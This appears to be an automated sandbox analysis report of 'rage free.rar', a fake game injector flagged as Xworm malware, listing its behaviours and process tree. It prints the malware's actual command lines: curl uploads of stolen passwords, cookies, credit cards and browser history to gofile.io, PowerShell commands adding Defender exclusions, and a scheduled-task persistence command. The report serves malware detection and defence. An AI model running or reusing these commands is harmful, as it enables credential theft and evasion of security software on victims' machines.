Analysis Overview
SHA256
b4da01818ad42712ce44298b148f94971ee4a2e0fff1b6f97f09955b9ba8c059
Threat Level: Known bad
The file rage free.rar was found to be: Known bad.
Malicious Activity Summary
Xworm
Detect Xworm Payload
NirSoft WebBrowserPassView
Nirsoft
Downloads MZ/PE file
Sets service image path in registry
Executes dropped EXE
UPX packed file
Checks computer location settings
Loads dropped DLL
Reads user/profile data of web browsers
Drops startup file
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Detects Pyinstaller
Detects videocard installed
Modifies registry class
Uses Task Scheduler COM API
Runs net.exe
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious behavior: LoadsDriver
Gathers system information
Enumerates processes with tasklist
NTFS ADS
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-08 00:54
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-08 00:53
Reported
2024-04-08 01:27
Platform
win10v2004-20231215-en
Max time kernel
1799s
Max time network
1798s
Command Line
Signatures
Detect Xworm Payload
Xworm
NirSoft WebBrowserPassView
Nirsoft
Downloads MZ/PE file
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\lBmHlTePJveVGiHnIonWMPc\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\lBmHlTePJveVGiHnIonWMPc" | C:\Windows\SoftwareDistribution\Download\qOTtu.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VPkrhDddTg\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\VPkrhDddTg" | C:\Windows\SoftwareDistribution\Download\q8q5y.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\rage free\Injector.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Nothere.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | C:\Users\Admin\AppData\Roaming\creal.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windowshalper(legit).lnk | C:\Users\Admin\AppData\Roaming\Nothere.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windowshalper(legit).lnk | C:\Users\Admin\AppData\Roaming\Nothere.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | C:\Users\Admin\AppData\Roaming\creal.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windowshalper(legit) = "C:\\Users\\Admin\\AppData\\Roaming\\Windowshalper(legit).exe" | C:\Users\Admin\AppData\Roaming\Nothere.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SoftwareDistribution\Download\qOTtu.exe | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
| File created | C:\Windows\SoftwareDistribution\Download\q8q5y.exe | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
Detects Pyinstaller
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1497073144-2389943819-3385106915-1000\{95C05F79-8320-4FBB-9BCD-666A7DF3FCDB} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1497073144-2389943819-3385106915-1000\{12C6F3AF-6270-4AB8-BFB0-A6A5203BBF31} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files\7-Zip\7zFM.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 101396.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SoftwareDistribution\Download\qOTtu.exe | N/A |
| N/A | N/A | C:\Windows\SoftwareDistribution\Download\q8q5y.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Nothere.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\VANTA\x64\Release\GeforceNOW.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\rage free.rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\rage free.rar"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9747646f8,0x7ff974764708,0x7ff974764718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9747646f8,0x7ff974764708,0x7ff974764718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\rage free\Injector.exe
"C:\Users\Admin\Desktop\rage free\Injector.exe" "C:\Users\Admin\Desktop\rage free\test.dll"
C:\Users\Admin\AppData\Roaming\injector.exe
"C:\Users\Admin\AppData\Roaming\injector.exe"
C:\Users\Admin\AppData\Roaming\creal.exe
"C:\Users\Admin\AppData\Roaming\creal.exe"
C:\Users\Admin\AppData\Roaming\Nothere.exe
"C:\Users\Admin\AppData\Roaming\Nothere.exe"
C:\Users\Admin\AppData\Roaming\creal.exe
"C:\Users\Admin\AppData\Roaming\creal.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c color 9
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Nothere.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Nothere.exe'
C:\Windows\SoftwareDistribution\Download\qOTtu.exe
"C:\Windows\SoftwareDistribution\Download\qOTtu.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windowshalper(legit).exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store10.gofile.io/uploadFile
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windowshalper(legit)" /tr "C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store10.gofile.io/uploadFile
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\Desktop\rage free\Injector.exe
"C:\Users\Admin\Desktop\rage free\Injector.exe"
C:\Users\Admin\AppData\Roaming\injector.exe
"C:\Users\Admin\AppData\Roaming\injector.exe"
C:\Users\Admin\AppData\Roaming\creal.exe
"C:\Users\Admin\AppData\Roaming\creal.exe"
C:\Users\Admin\AppData\Roaming\Nothere.exe
"C:\Users\Admin\AppData\Roaming\Nothere.exe"
C:\Users\Admin\AppData\Roaming\creal.exe
"C:\Users\Admin\AppData\Roaming\creal.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c color 9
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store2.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store2.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store2.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store2.gofile.io/uploadFile
C:\Windows\SoftwareDistribution\Download\q8q5y.exe
"C:\Windows\SoftwareDistribution\Download\q8q5y.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store2.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store2.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store2.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store2.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store2.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store2.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store2.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store2.gofile.io/uploadFile
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9747646f8,0x7ff974764708,0x7ff974764718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5480 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5484 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
